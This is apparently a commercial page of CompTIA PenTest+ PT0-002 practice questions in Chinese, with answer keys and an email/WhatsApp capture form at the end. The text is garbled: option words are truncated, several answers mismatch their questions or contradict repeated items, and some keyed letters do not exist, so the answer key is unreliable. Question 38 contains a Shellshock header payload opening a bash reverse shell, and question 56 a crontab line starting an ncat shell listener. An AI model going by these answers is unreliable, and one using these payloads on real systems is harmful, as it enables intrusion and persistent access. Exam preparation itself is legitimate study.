不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

有效備考的最新 CompTIA PenTest+ PT0-002 考試問題

我們廣泛收集的考試問題和答案、精心設計的試題以及寶貴的考試資源將爲您的學習之旅提供支持。我們的綜合學習材料涵蓋了考試中測試的所有關鍵主題,讓您在備考過程中充滿信心。從滲透測試方法到漏洞評估和管理,我們的資源專爲加強您的理解和提高您的考試準備程度而量身定製。實踐出真知,我們的模擬考試是評估您的知識和模擬考試環境的完美工具。找出優缺點,完善技能,滿懷信心地迎接考試。 有了我們的專家指導和一流的學習材料,您將能夠順利通過 CompTIA PenTest+ PT0-002 考試,並將您的網絡安全事業推向新的高度。今天就開始準備,獲得成功的考試體驗!
參加其他線上考試

問題 #1
滲透測試人員發現了一個漏洞,該漏洞提供了通過發現遍歷上傳到路徑的能力。通過此漏洞發現的一些文件是:以下哪種方法是幫助攻擊者獲得受影響計算機內部訪問權限的最佳方法?
A. 敏感客戶數據是否可公開訪問
B. 和客戶機之間的連接是否安全
C. 戶的員工是否接受過正確使用平臺的培訓
D. 是否使用安全的 SDLC 開發了雲應用程序
查看答案
正確答案: C
問題 #2
一家軟件公司聘請了一名安全顧問來評估公司軟件開發實踐的安全性。該顧問選擇通過對軟件二進制執行模糊處理來開始偵察。安全顧問最有可能發現以下哪個漏洞?
A. 弱認證方案
B. 以字符串存儲的憑證
C. 衝區溢出
D. 資源管理未優化
查看答案
正確答案: C
問題 #3
以下哪類信息最有可能包含在針對開發人員的應用程序安全評估報告中?(選擇兩項)。
A. 頭蛇
B. 膛手約翰
C. 該隱和亞伯
D. 美杜莎
查看答案
正確答案: BC
問題 #4
滲透測試人員接到一項任務,攻擊 192.168.1.0/24 範圍內的一系列目標,儘可能少觸發警報和反措施。下列哪種 Nmap 掃描語法能最好地實現這一目標?
A. map ג "sT ג "vvv ג "O 192
B. map ג "sV 192
C. map ג "sA ג "v ג "O 192
D. map ג "sS ג "O 192
查看答案
正確答案: D
問題 #5
滲透測試結束後,滲透測試人員正在清理和掩蓋痕跡。測試人員應確保從系統中刪除以下哪些內容?(選擇兩項)。
A. 卵貝殼
B. 建用戶賬戶
C. 務器日誌
D. 理員賬戶
E. 啓系統
F. RP 緩存
查看答案
正確答案: BC
問題 #6
一家郵件服務公司聘請了一名滲透測試人員對 SMTP 服務器上的所有用戶賬戶進行枚舉,以確定以前的工作人員賬戶是否仍處於活動狀態。應使用以下哪些命令來實現這一目標?
A. RFY 和 EXPN
B. RFY 和 TURN
C. EXPN 和 TURN
D. CPT TO 和 VRFY
查看答案
正確答案: A
問題 #7
滲透測試人員從被入侵的網絡服務器上下載了一個 Java 應用程序文件,並通過查看以下日誌確定了如何調用該文件:要驗證 Java 應用程序是否使用了套接字加密,滲透測試人員需要遵循以下哪個步驟的順序?
A. 行應用程序漏洞掃描,然後確定應用程序使用的 TCP 端口。
B. 行連接到調試器的應用程序,然後查看應用程序的日誌。
C. 匯編二進制代碼,然後確定斷點。
D. 用 Wireshark 啓動數據包捕獲,然後運行應用程序。
查看答案
正確答案: D
問題 #8
滲透測試人員完成了一項評估,刪除了測試期間創建的所有人工製品和賬戶,並向客戶提交了評估結果。接下來會發生以下哪種情況?
A. 透測試人員進行重新測試。
B. 透測試人員刪除客戶機上的所有腳本。
C. 戶爲系統打補丁。
D. 戶端清除測試期間生成的系統日誌。
查看答案
正確答案: C
問題 #9
在以下哪種情況下,滲透測試人員需要通知緊急聯繫人?
A. 隊利用了組織內的一個關鍵服務器。
B. 隊從組織中竊取 PII 或信用卡數據。
C. 隊失去遠程訪問網絡的權限。
D. 組在網絡系統中發現了另一個角色。
查看答案
正確答案: D
問題 #10
一名滲透測試員正在向一家公司的首席法律顧問解釋 MITRE ATT&CK 框架。測試員最有可能將以下哪項描述爲該框架的優點?
A. 了解安全入侵的策略有助於瓦解入侵。
B. 爲框架一部分的腳本可直接導入 SIEM 工具。
C. 方法可用於更好地估算事故成本。
D. 框架是靜態的,可確保安全程序隨着時間的推移保持穩定。
查看答案
正確答案: A
問題 #11
以下哪個概念定義了在滲透測試中進行的一系列具體步驟和方法?
A. 範圍詳情
B. 調查結果
C. 方法
D. 工作說明
查看答案
正確答案: C
問題 #12
滲透測試人員在對一個網絡應用程序進行人工評估時發現了以下有效 URL: http://www.example.com/product.php?id=123987.Which 以下自動工具中最好使用 NEXT 來嘗試識別該 URL 中的漏洞?
A. QLmap
B. essus
C. ikto
D. irBuster
查看答案
正確答案: A
問題 #13
滲透測試人員完成了對網絡服務器的漏洞掃描,發現了一個單一但嚴重的漏洞。
A. 運行另一個掃描儀進行比較。
B. 對服務器進行手動測試。
C. 檢查掃描儀上的結果。
D. 在網上查找漏洞。
查看答案
正確答案: B
問題 #14
拖放(不支持拖放)在滲透測試期間,您訪問了一個用戶界面有限的系統。操作方法分析代碼段以確定完成端口掃描腳本所需的部分,將適當的元素拖放到正確的位置以完成腳本。
A. 案見說明部分。
查看答案
正確答案: A
問題 #15
滲透測試人員正在沙盒環境中測試新版移動應用程序。爲了攔截和解密應用程序與外部應用程序接口之間的流量,測試人員創建了一個私有根 CA 並從中簽發了證書。儘管測試人員已將根 CA 安裝到用於測試的智能手機的可信石中,但應用程序仍顯示錯誤,表明證書不匹配,並且無法連接到服務器。以下哪項最有可能是造成這種情況的原因?
A. CP 端口 443 在防火牆上未打開
B. 用程序接口服務器使用的是 SSL 而不是 TLS
C. 試人員使用的是過時的應用程序版本
D. 用程序已鎖定 API 證書。
查看答案
正確答案: D
問題 #16
一家私人調查公司要求進行滲透測試,以確定攻擊者是否有可能訪問移動設備,然後從這些設備中竊取數據。以下哪種社交工程方法一旦成功,最有可能實現這兩個目標?
A. 發送包含惡意應用程序下載鏈接的僞造服務號碼短信。
B. 利用 MDM 中的漏洞,創建新賬戶和設備配置文件。
C. IT 服務臺進行網絡釣魚,以收集用於僞裝的認可設備 IMEI 列表。
D. 員工經常使用的網站上植入針對 x86 架構的惡意軟件。
查看答案
正確答案: A
問題 #17
一名專業安全人員希望通過向監聽 TCP 3011 端口的專有服務發送無效數據包來測試物聯網設備。以下哪種方法可以讓專業安全人員使用任意數字輕鬆地以編程方式操縱 TCP 報頭長度和校驗和,並觀察專有服務的響應情況?
A. map
B. cpdump
C. capy
D. ping3
查看答案
正確答案: C
問題 #18
滲透測試人員已經確定了路徑上的攻擊位置,現在必須專門製作 DNS 查詢響應,並將其發送回目標主機。
A. ocat
B. cpdump
C. capy
D. 掘
查看答案
正確答案: C
問題 #19
公司的狩獵團隊最希望在最終報告中看到以下哪項內容?
A. 執行摘要
B. 攻擊戰術
C. 方法
D. 範圍詳情
查看答案
正確答案: B
問題 #20
正在進行公司要求的評估的滲透測試人員希望通過雙重標記向另一個系統發送流量。
A. 克隆 RFID
B. RFID 標籤
C. 元標記
D. 籤嵌套
查看答案
正確答案: D
問題 #21
首席信息安全官希望滲透測試人員評估公司員工的安全意識水平,以下哪些工具可以幫助測試人員實現這一目標?
A. etasploit
B. 頭蛇
C. ET
D. WPS 掃描
查看答案
正確答案: C
問題 #22
一家公司聘請了一個滲透測試小組來檢查一家製造廠的網絡物理系統。滲透測試小組立即發現監控系統和 PLC 都連接到了公司內網。如果滲透測試小組做出以下假設,哪種假設最有可能成立?
A. LC 不會執行通過網絡注入的命令。
B. 控器和控制器默認位於不同的虛擬網絡上。
C. 制器不會驗證命令的來源。
D. 管系統會檢測到惡意注入的代碼/命令。
查看答案
正確答案: C
問題 #23
滲透測試人員編寫了以下腳本:測試人員正在執行以下哪項工作?
A. 搜索服務漏洞
B. 試恢復丟失的綁定外殼
C. 建一個反向 shell,監聽指定端口
D. 描網絡的特定開放端口
查看答案
正確答案: D
問題 #24
一名滲透測試人員受僱執行物理滲透測試,以進入客戶大樓內的一個安全房間。外部偵察發現了兩個入口、一個 WiFi 訪客網絡和多個連接到互聯網的安全攝像頭。
A. ardriving
B. hodan
C. econ-ng
D. ircrack-ng
查看答案
正確答案: B
問題 #25
Nmap 掃描顯示網絡服務器和數據庫上存在開放端口。滲透測試人員決定運行 WPScan 和 SQLmap 來識別這些系統的漏洞和其他信息。
A. 根據收集到的證據揭露潛在的犯罪活動。
B. 別環境中的所有漏洞。
C. 據範圍限制侵入性。
D. 對調查結果保密。
查看答案
正確答案: B
問題 #26
一家公司聘請了一名滲透測試人員在網絡上部署和設置一個惡意接入點。以下哪種工具是實現這一目標的最佳工具?
A. ireshark
B. ircrack-ng
C. ismet
D. ifite
查看答案
正確答案: B
問題 #27
Nmap 網絡掃描發現了五個開放端口和已識別的服務。滲透測試人員應使用以下哪種工具確定開放端口是否存在漏洞及相關漏洞利用?
A. penVAS
B. rozer
C. 嗝套房
D. WASP ZAP
查看答案
正確答案: A
問題 #28
滲透測試人員獲取系統訪問權限並建立持久性,然後運行以下命令:測試人員最有可能執行以下哪項操作?
A. Bash 歷史記錄重定向到 /dev/null
B. 製用戶的 Bash 歷史記錄,以便進一步枚舉
C. 過清除 Bash 歷史記錄來掩蓋痕跡
D. 系統中製作誘餌文件,迷惑事件響應者
查看答案
正確答案: C
問題 #29
滲透測試人員編寫了以下腳本:測試人員試圖實現以下哪些目標?
A. 確定網絡上的活動主機。
B. 置 ping 數據包的 TTL 以實現隱身。
C. 寫聯網設備的 ARP 表。
D. 掃描系統中最常用的端口。
查看答案
正確答案: A
問題 #30
滲透測試人員獲取系統訪問權限並建立持久性,然後運行以下命令:測試人員最有可能執行以下哪項操作?
A. Bash 歷史記錄重定向到 /dev/null
B. 製用戶的 Bash 歷史記錄,以便進一步枚舉
C. 過清除 Bash 歷史記錄來掩蓋痕跡
D. 系統中製作誘餌文件,迷惑事件響應者
查看答案
正確答案: C
問題 #31
一名滲透測試人員需要進入一棟大樓,該大樓有上鎖的大門、安全小組和攝像頭把守。測試人員可以使用以下哪種技術進入 IT 框架而不被發現?
A. 鎖
B. 遠程禁用攝像機。
C. 充包裹投遞員
D. 送網絡釣魚電子郵件
查看答案
正確答案: C
問題 #32
滲透測試人員在訪問前一個系統後,對網絡運行了 Nmap 掃描,結果如下:測試人員隨後從前一個被利用的系統運行了以下命令,但失敗了:以下哪項解釋了命令失敗的原因?
A. 動掃描
B. 掃平
C. 協議逆轉
D. 據包分析
查看答案
正確答案: A
問題 #33
一名滲透測試人員正在評估一個無線網絡。雖然監測到了正確的信道和 SSID,但測試人員無法捕獲客戶端與接入點之間的握手。以下哪種攻擊對滲透測試人員捕捉握手最有效?
A. 重新安裝密鑰
B. 取消身份驗證
C. 邪惡的雙胞胎
D. 重放
查看答案
正確答案: B
問題 #34
一名滲透測試人員收到了一個 16 位的網絡塊,並對其進行了評估。在評估過程中,測試人員發現所提供的 IP 地址塊中沒有主機處於活動狀態,於是向公司報告了這一情況。公司隨後向測試員提供了一個更新的 IP 塊。以下哪項是最合適的下一步?
A. 終止合同。
B. 用新的籤名更新 ROE。
C. 描 8 位數據塊,映射更多遺漏主機。
D. 繼續評估。
查看答案
正確答案: B
問題 #35
滲透測試人員能夠捕獲客戶端和服務器之間的 NTLM 挑戰-響應流量。以下哪種方法可以利用 pcap 獲得服務器訪問權?
A. 行垂直權限升級。
B. 將捕獲的流量重放至服務器,以重新創建會話。
C. 用開膛手約翰破解密碼。
D. 用傳遞哈希攻擊。
查看答案
正確答案: D
問題 #36
以下哪項是對 OWASP Top 10 的最佳描述?
A. 絡應用程序最關鍵的風險
B. 網絡應用程序的所有風險清單
C. 重要性排序的風險
D. 絡應用程序安全標準
E. 風險治理和合規框架
F. 阿帕奇漏洞清單
查看答案
正確答案: AC
問題 #37
在接到間歇性連接問題報告後,一名顧問正在審查以下輸出:顧問最有可能報告以下哪項?
A. 網絡上的一臺設備的 IP 地址位於錯誤的子網中。
B. 用錯誤的組播組啓動了組播會話。
C. RP泛洪攻擊是利用廣播地址執行 DDoS。
D. 絡上的一臺設備毒害了 ARP 緩存。
查看答案
正確答案: D
問題 #38
滲透測試人員在 10.10.1.1 發現了一個易受攻擊的網絡服務器。然後,測試人員編輯了一個 Python 腳本,發送網絡漏洞利用程序,並遇到以下代碼: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} 測試人員應該對腳本進行以下哪項編輯,以確定運行服務器的用戶上下文?
A. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10
查看答案
正確答案: A
問題 #39
正在對網站進行滲透測試的測試人員收到以下輸出:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62Which of the following commands can be used to further attack the website?
A. 進入目標主機並植入專門爲此製作的惡意軟件。
B. 用本地 DNS 服務器,使用欺騙的 A 記錄添加/更新區域記錄。
C. 用 Scapy 實用程序覆蓋 DNS 查詢響應中的名稱解析字段。
D. 目標主機的 HTTP 連接代理到欺騙主機的 HTTP 連接。
查看答案
正確答案: D
問題 #40
一名正在進行安全評估的滲透測試人員發現,網絡犯罪分子正在積極利用一個關鍵漏洞。
A. 繫主要聯繫人。
B. 法擊倒襲擊者。
C. 即呼叫執法人員。
D. 收集適當的證據,並將其添加到最終報告中。
查看答案
正確答案: A
問題 #41
在以應用程序開發人員團隊爲目標受衆編寫的靜態應用程序安全測試最終報告中,以下哪項最重要?
A. 所用滲透測試方法執行摘要
B. 料清單,包括用品、分包合同和評估期間產生的費用
C. 功入侵軟件後的定量影響評估
D. 安全類型轉換操作實例的代碼上下文
查看答案
正確答案: C
問題 #42
滲透測試人員編寫了以下腳本,用於一次任務:該腳本將執行以下哪些操作?
A. 行新的滲透測試。
B. 對發現的問題進行補救。
C. 供常見漏洞和暴露清單。
D. 大滲透測試的範圍。
查看答案
正確答案: A
問題 #43
在編寫用於在 Bash 中解釋的 shell 腳本時,應明確指定解釋器 /bin/bash。爲實現這一目標,應在腳本的第一行使用下列哪種字符組合?
A. #
B. $
C. #
D. $
E. !
查看答案
正確答案: E
問題 #44
滲透測試人員希望在特定域的網絡文檔中找到隱藏信息。滲透測試人員應該使用以下哪種方法?
A. etcraft
B. entralOps
C. 答覆者
D. OCA
查看答案
正確答案: D
問題 #45
基於合規性的滲透測試主要涉及以下方面
A. 從受保護網絡獲取 PII。
B. 繞過邊緣設備的保護。
C. 確定特定安全標準的有效性。
D. 從受保護網絡獲取特定信息。
查看答案
正確答案: C
問題 #46
某公司使用雲提供商提供的共享網絡帶寬在專用服務器上託管網絡應用程序。該公司與雲提供商聯繫,防止任何會干擾雲提供商其他客戶的活動。在與滲透測試公司合作測試應用程序時,該公司應避免以下哪種情況?
A. 取網絡應用程序的 URL 尋找漏洞
B. 應用程序服務器的所有 IP 地址進行指紋識別
C. 力破解應用程序密碼
D. 秒發送大量網絡請求以測試 DDoS 防護
查看答案
正確答案: D
問題 #47
一名滲透測試人員運行了一個基於 Python 的簡單掃描程序。以下是代碼片段:以下哪項最恰當地描述了該腳本觸發組織 IDS 中 "可能的端口掃描 "警報的原因?
A. 7 行的 A
B. 1 行的 B
C. 行使用了 socket
D. emoteSvr變量既沒有類型提示,也沒有初始化。
查看答案
正確答案: B
問題 #48
滲透測試人員與客戶之間必須籤署以下哪份文件,以管理在業務約定之前、期間和之後如何管理所提供的任何信息?
A. SA
B. DA
C. OW
D. OE
查看答案
正確答案: B
問題 #49
滲透測試人員在一臺計算機上運行 unshadow 命令,測試人員下一步最有可能使用以下哪種工具?
A. 開膛手約翰
B. 頭蛇
C. imikatz
D. 該隱和亞伯
查看答案
正確答案: A
問題 #50
一名滲透測試人員正在進行滲透測試。測試人員在一臺 Linux 服務器上獲取了一個 root 級 shell,並在 /home/svsacct 目錄中一個名爲 password.txt 的文件中發現了以下數據:U3VQZXIkM2NyZXQhCg===測試人員應使用 NEXT 中的哪條命令來解碼文件內容?
A. cho U3VQZXIkM2NyZXQhCg== | base64 ג€"d
B. ar zxvf password
C. ydra ג "l svsacct ג "p U3VQZXIkM2NyZXQhCg== ssh://192
D. ohn --wordlist /usr/share/seclists/rockyou
查看答案
正確答案: A
問題 #51
在一次任務中,滲透測試人員在一個文件中發現了以下字符串列表:以下哪項是確定字符串已知明文的最佳技術?
A. 典攻擊
B. 彩虹表攻擊
C. 力攻擊
D. 證充塞攻擊
查看答案
正確答案: B
問題 #52
一名滲透測試人員準備爲客戶開展活動,要求儘量減少對公司運營的幹擾。以下哪些工具屬於被動偵察工具?(選擇兩項)。
A. map -P0 -T0 -sS 192
B. map -sA -sV --host-timeout 60 192
C. map -f --badsum 192
D. map -A -n 192
查看答案
正確答案: AE
問題 #53
某公司擔心其雲服務提供商沒有爲其軟件開發的虛擬機提供足夠的保護。這些虛擬機位於數據中心,與其他公司共享物理資源。該公司最擔心以下哪種攻擊類型?
A. 數據泛濫
B. 騎馬會議
C. 搶註
D. 側通道
查看答案
正確答案: D
問題 #54
滲透測試人員正在檢查一個 C 級網絡,以快速識別活動系統。滲透測試員應使用以下哪些命令?
A. map -sn 192
B. map -sn 192
C. map -sn 192
D. map -sN 192
查看答案
正確答案: B
問題 #55
以下哪項描述了滲透測試人員在被測試人員入侵的 Windows 服務器上運行 sdelete mimikatz 命令的原因? * 的原因是什麼?
A. 除散列破解註冊表項
B. 除測試人員創建的 Mimikatz 賬戶
C. 服務器上刪除工具
D. 系統中刪除反向外殼
查看答案
正確答案: C
問題 #56
滲透測試人員成功訪問了移動客戶筆記本電腦上的 Windows 工作站,以下哪項可用於確保測試人員能夠保持對系統的訪問?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo ?€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash?€)| crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
查看答案
正確答案: C
問題 #57
以下哪項提供的開發套件的有效載荷模塊涵蓋最廣泛的目標系統類型?
A. essus
B. etasploit
C. 嗝套房
D. thercap
查看答案
正確答案: B
問題 #58
某公司使用雲提供商提供的共享網絡帶寬在專用服務器上託管網絡應用程序。該公司與雲提供商聯繫,防止任何會干擾雲提供商其他客戶的活動。在與滲透測試公司合作測試應用程序時,該公司應避免以下哪種情況?
A. 取網絡應用程序的 URL 以查找漏洞
B. 應用程序服務器的所有 IP 地址進行指紋識別
C. 力破解應用程序密碼
D. 秒發送大量網絡請求以測試 DDoS 防護
查看答案
正確答案: D
問題 #59
以下哪項提供了攻擊者常用戰術和技術矩陣以及建議的緩解措施?
A. IST SP 800-53
B. WASP Top 10
C. MITRE ATT&CK 框架
D. PTES 技術準則
查看答案
正確答案: C
問題 #60
一名滲透測試人員正在查看以下來自 dig 的 comptia.org 的 DNS 偵查結果:...;; ANSWER SECTIONcomptia.org.3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org.3569 IN A 3.219.13.186. comptia.org.3569 IN NS ns1.comptia.org.3569 IN SOA haven. administrator.comptia.org.3569 IN MX new.mx0.comptia.org.3569 IN MX new.mx1.comptia.org 根據此輸出,滲透測試人員可以確定以下哪些潛在問題?
A. 少有一條記錄不在範圍內。
B. 一個重複的 MX 記錄。
C. S記錄不在適當的域內。
D. omptiA
查看答案
正確答案: A
問題 #61
在雲環境中進行滲透測試時,滲透測試人員應首先考慮以下哪項?
A. 雲服務提供商是否允許滲透測試人員測試環境
B. 用程序是否正在使用特定的雲服務
C. 行雲服務的地理位置
D. 服務所在國是否有任何阻礙法律
查看答案
正確答案: A
問題 #62
一名滲透測試人員使用 -F 選項對一臺面向互聯網的網絡設備進行了 Nmap 掃描,發現了幾個開放端口。爲了進一步枚舉,測試人員使用以下命令運行了另一次掃描:Nmap -O -A -sS -p- 100.100.100.50Nmap 返回所有 65,535 個端口都已被過濾,在第二次掃描中最有可能出現以下哪種情況?
A. 火牆或 IPS 阻止了掃描。
B. 透測試人員使用了不支持的標記。
C. 緣網絡設備已斷開。
D. 描返回 ICMP echo 回復。
查看答案
正確答案: A
問題 #63
在雲環境中進行滲透測試時,滲透測試人員應首先考慮以下哪項?
A. 服務提供商是否允許滲透測試人員測試環境
B. 用程序是否正在使用特定的雲服務
C. 服務運行的地理位置
D. 服務所在國是否有任何阻礙法律
查看答案
正確答案: C
問題 #64
一名評估員希望儘可能安靜地運行 Nmap 掃描。以下哪個命令被發現的幾率最小?
A. 找開放的端口。
B. 聽反向炮彈。
C. 圖淹沒開放的端口。
D. 創建加密隧道。
查看答案
正確答案: C
問題 #65
滲透測試員收到了一個 .pcap 文件,用於在一次任務中查找憑證。測試員應使用以下哪些工具打開並讀取 .pcap 文件?
A. map
B. Wireshark
C. etasploit
D. etcat
查看答案
正確答案: B
問題 #66
滲透測試人員對一臺服務器進行掃描,得到以下輸出結果:滲透測試人員應嘗試下一個命令序列中的哪一個?
A. tp 192
B. mbclient \\\\\\\\WEB3\\\\IPC$ -I 192
C. crack -u Administrator -P 15worst_passwords
D. url -X TRACE https://192
查看答案
正確答案: A
問題 #67
滲透測試人員能夠從服務器上收集 MD5 哈希值,並使用彩虹表輕鬆破解哈希值。以下哪項應作爲建議納入修復報告?
A. 更強的算法要求
B. 服務器上的訪問控制
C. 戶密碼加密
D. 丁管理計劃
查看答案
正確答案: A
問題 #68
滲透測試人員正在評估一家公司的網絡邊界。測試人員獲得的有關防禦控制或對策的信息有限,測試的內部知識也有限。以下哪項應作爲計劃偵察活動的第一步?
A. 網塊進行外部掃描。
B. 檢查該公司的 WHOIS 和 netblock 記錄。
C. 用 DNS 查找和挖掘來確定外部主機。
D. 公司的網塊進行 ping 掃描。
查看答案
正確答案: B
問題 #69
在滲透測試過程中,測試人員能夠將 example.com/login.php?id=5 的 URL 值更改爲 example.com/login.php?id=10,從而訪問網絡應用程序。滲透測試人員利用了以下哪些漏洞?
A. 令注入
B. 證失效
C. 接對象參照
D. 站腳本
查看答案
正確答案: B
問題 #70
滲透測試人員對目標進行 Nmap 掃描,得到以下結果:測試人員應使用以下哪項來重定向目標上使用 TCP 1080 端口的掃描工具?
A. essus
B. 代理鏈
C. WASP ZAP
D. 國
查看答案
正確答案: B
問題 #71
以下哪種工具最有助於收集物聯網設備的供應商和其他安全相關信息,以支持被動偵察?
A. 丹
B. map
C. ebScarab-NG
D. 薩斯
查看答案
正確答案: B
問題 #72
一名安全工程師在網絡上發現了一臺新服務器,他想掃描這臺主機,以確定它運行的是否是經批准的 Linux 版本和已打補丁的 Apache 版本。下面哪個命令可以完成這項任務?
A. map ג "f ג "sV ג "p80 192
B. map ג "sS ג "sL ג "p80 192
C. map ג "A ג "T4 ג "p80 192
D. map ג "O ג "v ג "p80 192
查看答案
正確答案: C
問題 #73
滲透測試人員使用 dirb 工具掃描網絡服務器後得到以下結果:以下哪個元素最有可能包含對滲透測試人員有用的信息?
A. index
B. 關於
C. 信息
D. home
查看答案
正確答案: B
問題 #74
一名滲透測試人員正在查找一個漏洞,該漏洞可使攻擊者通過用於物理訪問控制系統的專門 TCP 服務打開門。該服務存在於 100 多臺不同的主機上,因此測試人員希望自動進行評估。識別要求滲透測試人員:-擁有一個完整的 TCP 連接-發送一個 "hello "有效載荷-等待響應-發送一個長度超過 16 字節的字符串以下哪種方法能最好地支持該目標?
A. 運行 nmap -Pn -sV --script vuln
B. 對主機的 TCP 端口進行 OpenVAS 簡單掃描。
C. Lua 語言創建腳本並與 NSE 一起使用。
D. 用 Nessus 執行憑證掃描。
查看答案
正確答案: C
問題 #75
PCI DSS 要求將以下哪項作爲滲透測試流程的一部分?
A. 透測試人員必須獲得網絡安全認證。
B. 絡必須分段。
C. 應對面向外部的系統進行測試。
D. 估必須在非工作時間進行。
查看答案
正確答案: B
問題 #76
以下哪種協議或技術可爲通過電子郵件發送最終安全評估報告提供在途保密保護?
A. /MIME
B. TPS
C. NSSEC
D. S2
查看答案
正確答案: A
問題 #77
一名顧問剛剛對遠程主機上的所有開放端口進行了 SYN 掃描,現在需要遠程識別主機上運行的服務類型。要完成這項任務,最好使用以下哪種主動偵察工具?
A. cpdump
B. Snort
C. map
D. etstat
E. uzzer
查看答案
正確答案: C
問題 #78
滲透測試人員從 Nmap 掃描中得到以下結果:目標最有可能運行以下哪個操作系統?
A. CentOS
B. rch Linux
C. Windows 服務器
D. buntu
查看答案
正確答案: C
問題 #79
在包括普通 IT 服務器和工業控制系統的混合網段上運行漏洞掃描儀:
A. 將揭示 Modbus 協議中的漏洞
B. 能導致控制系統出現意外故障
C. 能會降低檢測結果的真實陽性率
D. 將在 IP 網絡上造成拒絕服務狀況
查看答案
正確答案: B
問題 #80
滲透測試人員已獲得 Windows 主機的 shell 訪問權限,並希望使用 ymic.exe 進程調用創建功能運行特製的二進制文件,以便稍後執行。以下哪種操作系統或文件系統機制最有可能支持這一目標?
A. 備用數據流
B. owerShell模塊
C. MP4 隱寫術
D. rocMon
查看答案
正確答案: D
問題 #81
一家公司的首席執行官創建了一個二級家庭辦公室,他擔心正在使用的 WiFi 服務容易受到攻擊。以下哪項最容易受到暴力破解攻擊?
A. WPS
B. PA2-EAP
C. PA-TKIP
D. PA2-PSK
查看答案
正確答案: A
問題 #82
在一個未受保護的網絡文件庫中,滲透測試人員發現了一個包含明文用戶名和密碼的文本文件,以及一個包含 50 名員工數據(包括全名、角色和序列號)的電子表格。測試人員發現文本文件中的部分密碼格式如下測試人員發現文本文件中的某些密碼格式如下:<姓名-序列號>。
A. 建自定義密碼字典,爲密碼噴塗測試做準備。
B. 議使用密碼管理器/保險庫,而不是文本文件來安全地存儲密碼。
C. 議在所有系統和應用程序中配置密碼複雜性規則。
D. 滲透測試報告中將未受保護的文件庫記錄爲一項發現。
查看答案
正確答案: D
問題 #83
以下哪個 Pacu 模塊能讓測試人員確定現有用戶的訪問級別?
A. am_enum_permissions
B. am_prive_sc_scan
C. am_backdoor_assume_role
D. am_bruteforce_permissions
查看答案
正確答案: A
問題 #84
滲透測試人員需要對網絡服務器進行漏洞掃描。測試人員最有可能選擇以下哪種工具?
A. map
B. ikto
C. 該隱和亞伯
D. thercap
查看答案
正確答案: B
問題 #85
在滲透測試過程中,域名、IP 範圍、主機和應用程序都會在 "滲透測試 "中定義:
A. script>var adr = '
B.
C. var/www/html/index
D.
查看答案
正確答案: C

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: